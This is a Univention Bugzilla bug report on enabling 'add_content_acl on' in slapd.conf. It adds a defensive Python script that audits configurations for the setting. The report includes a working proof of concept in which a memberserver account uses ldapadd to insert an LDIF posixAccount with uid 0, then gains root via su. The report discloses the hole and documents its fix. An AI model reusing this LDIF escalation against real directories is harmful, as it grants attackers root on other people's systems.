Univention Bugzilla – Bug 41797
add add_content_acl on to slapd.conf
Last modified: 2021-06-23 07:29:08 CEST
The content of LDAP ACLs is only evaluated if the database entry in slapd.conf contains "add_content_acl on". Memberservers/DCs can create arbitrary objects in various positions otherwise. As there are dependencies between UCS and UCS@school we release this part of Bug #41715 a little bit later.

+++ This bug was initially created as a clone of Bug #41715 +++

Preconditions: Having a memberserver/slave/master/backup or any object underneath cn=memberserver,cn=computers,$ldap_base / cn=dc,cn=computers,$ldap_base.

root@xen3:~# eval "$(ucr shell)"
root@xen3:~# udm container/cn create --set name=memberserver --position "cn=computers,$ldap_base"
Object created: cn=memberserver,cn=computers,dc=school,dc=local
root@xen3:~# eval "$(ucr shell)"; udm computers/memberserver create --set name=hacker --position="cn=memberserver,cn=computers,$ldap_base" --set password=univention
Object created: cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local

# now PWN it
$ cat posix_account.ldif
dn: univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local
univentionAppID: foobar
objectClass: univentionApp
objectClass: posixAccount
uid: hacker
cn: hacker
uidNumber: 0
gidNumber: 0
homeDirectory: /root
loginShell: /bin/bash
userPassword:: e2NyeXB0fSQ2JEguMDVWRC9EdVBueUlvTkMkeUlKd1lCWk5XVTRma0NWOFNFMHFpUDd5REIzSVFXbkZQUjA4VWkuTUtjSFFCWnZ5N09JbVUyYXZiMjJHVFlHbHpCZzRGanR0TVlDVXo4RldTcDBKbC8=
$ ldapadd -D cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local -w univention < posix_account.ldif
adding new entry "univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local"
$ su hacker
Passwort:
hacker@xen3:~# id
uid=0(hacker) gid=0(root) Gruppen=0(root)
r75785 | Changelog Bug #41797 univention-ldap (13.0.2-1):
r75784 | Bug #41797: add add_content_acl on configuration
Ok, I made the wording of the changelog entry a bit more verbose.

Relevant documentation from slapd.conf():
===============================================================================
add_content_acl: Controls whether Add operations will perform ACL checks on the content of the entry being added. [...]
===============================================================================

And slapd.access(5) says:
===============================================================================
Also if Add content ACL checking has been configured on the database [...], add (=a) will be required on all of the attributes being added.
===============================================================================
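An added audit check (it is not Univention code and not part of this bug): it splits a slapd.conf into its database stanzas and lists the suffixes of every database that does not carry "add_content_acl on", i.e. where slapd would accept an Add without the per-attribute ACL checks on the new entry's content that the report and the man page excerpts above describe. The sample configuration embedded below is constructed for the demo (its paths, suffixes and rootdn values are placeholders), and the parser assumes the plain slapd.conf layout: one "database" keyword per backend, one directive per line, continuation lines indented with whitespace.

```python
"""Audit a slapd.conf for databases that lack `add_content_acl on`.

Added example for this bug report; not Univention code. Assumes the
plain slapd.conf layout (one `database` keyword per backend, directives
on their own lines, indented lines continue the previous directive,
`#` starts a comment).
"""
import re
from typing import Dict, List, Optional

# Constructed sample slapd.conf, not copied from any real system.
# The first database still has the default (add_content_acl unset,
# i.e. off); the second carries the fix from this bug.
SAMPLE_SLAPD_CONF = """\
include /etc/ldap/schema/core.schema
loglevel 0

database mdb
suffix "dc=school,dc=local"
rootdn "cn=admin,dc=school,dc=local"
access to attrs=userPassword
    by self write
    by * auth

database mdb
suffix "dc=example,dc=org"
rootdn "cn=admin,dc=example,dc=org"
add_content_acl on
access to *
    by * read
"""


def parse_databases(conf_text: str) -> List[Dict[str, object]]:
    """Split slapd.conf into per-database stanzas.

    Each stanza records its backend, its suffix and whether
    `add_content_acl on` appears before the next `database` keyword.
    Directives before the first `database` line are global and ignored.
    """
    databases: List[Dict[str, object]] = []
    current: Optional[Dict[str, object]] = None
    for raw in conf_text.splitlines():
        # A line starting with whitespace continues the previous
        # directive (e.g. the `by` clauses of an access rule).
        if raw[:1].isspace():
            continue
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"^database\s+(\S+)", line, re.IGNORECASE)
        if m:
            current = {"backend": m.group(1), "suffix": None,
                       "add_content_acl": False}
            databases.append(current)
            continue
        if current is None:
            continue  # global section
        m = re.match(r'^suffix\s+"?([^"]+)"?', line, re.IGNORECASE)
        if m:
            current["suffix"] = m.group(1).strip()
            continue
        m = re.match(r"^add_content_acl\s+(on|off)\b", line, re.IGNORECASE)
        if m:
            current["add_content_acl"] = m.group(1).lower() == "on"
    return databases


def unprotected_suffixes(conf_text: str) -> List[str]:
    """Suffixes of databases where Add operations skip content ACL checks."""
    return [
        str(db["suffix"] or f"<{db['backend']} database without suffix>")
        for db in parse_databases(conf_text)
        if not db["add_content_acl"]
    ]


if __name__ == "__main__":
    # Usage on a real system would read /etc/ldap/slapd.conf instead.
    for suffix in unprotected_suffixes(SAMPLE_SLAPD_CONF):
        print(f"WARNING: {suffix}: add_content_acl is off, "
              "ACLs are not checked on the content of added entries")
```

Run against the sample it reports only dc=school,dc=local; on a real host point it at /etc/ldap/slapd.conf after the univention-ldap update and expect an empty result.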
UCS 4.2 has been released: https://docs.software-univention.de/release-notes-4.2-0-en.html https://docs.software-univention.de/release-notes-4.2-0-de.html If this error occurs again, please use "Clone This Bug".